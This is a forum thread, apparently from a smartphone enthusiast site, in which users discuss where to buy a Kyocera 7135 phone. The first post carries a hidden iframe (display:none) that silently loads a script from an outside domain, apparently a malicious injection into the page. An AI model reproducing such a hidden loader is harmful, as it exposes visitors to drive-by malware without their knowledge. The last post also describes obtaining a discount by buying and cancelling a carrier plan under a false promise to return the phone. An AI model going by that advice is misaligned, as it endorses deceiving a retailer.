+ Reply to Thread

The best source for purchasing a 7135?

Can anyone suggest the best retailer for purchasing the 7135? Seems to me that Alltel and Ebay are currently the most viable sources.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: The best source for purchasing a 7135?

Are you going to use it on Verizon? If so, I would suggest that you wait a few weeks until Verizon releases the phone. I bought mine in January through the Kyo/ getconnected web site and have been satisfied. Back then, no one knew when Verizon would release the 7135. But it now appears that Verizon is close to actual release of the phone this month. I would also caution against ebay There are risks associated with a purchase such as that, although you could get a good deal from a private party that did not want to keep his or her phone. Support could be required from Kyo or Verizon.

Originally posted by That Palm Guy
    Can anyone suggest the best retailer for purchasing the 7135? Seems to me that Alltel and Ebay are currently the most viable sources.

Can anyone suggest the best retailer for purchasing the 7135? Seems to me that Alltel and Ebay are currently the most viable sources.
    According to the sales drone I dealt with, Alltel doesn't retail phones. I got around it by telling them it was a birthday present for a relative that had Alltel service already. They insisted on selling me the cheapest prepaid plan with the phone, which made the purchase eligible for several discounts and brought my cost to $693+tax (if anyone wants to buy $25 of prepaid Alltel service, speak up anytime). If there's an Alltel store (or a WalMart in an Alltel service area) you should be able to walk out with one fairly easily (albeit $700+ poorer).

The other option is to order it from GetConnected.com (using procedures outlined many time previously, so I shan't go into it now)...

As Sethster suggests, waiting for the Verizon retail release may be your best bet. IMHO, the most reliable info seems to suggest a release date soon (see the posts from rfdesq and Smartbob at http://www.smartphonesource.com/vbul...pagenumber=177). So, if you intend to activate on Verizon, simply giving it a week or two may be the easiest way to go.

Ken

Kyocera Direct

Buy it from Kyocera direct. See this thread http://www.smartphonesource.com/vbul...&threadid=6242

Re: Re: The best source for purchasing a 7135?

Originally posted by kenf
    As Sethster suggests, waiting for the Verizon retail release may be your best bet. IMHO, the most reliable info seems to suggest a release date soon (see the posts from rfdesq and Smartbob at http://www.smartphonesource.com/vbul...pagenumber=177). So, if you intend to activate on Verizon, simply giving it a week or two may be the easiest way to go.

Ken
    ROFLOL, havent we been hearing a week or two for months.....

If you want it, I agree with mrdirtguy, call Diana at Kyocera and get hooked up!

I think its a good phone with great versatility!

I understand that a verizon store in midtown Manhattan has them in stock and for sale. I confirmed with an attorney for whom I do some work that he had it in his hand and it was for sale.

Easy way to get 7135

Just go to Alltel and purchase the phone and cheapest monthly plan. Then call the 800 number in a few days and cancel the plan and tell them you are going to return the phone at the store. Cost me only $549. Then called Verizon and activated.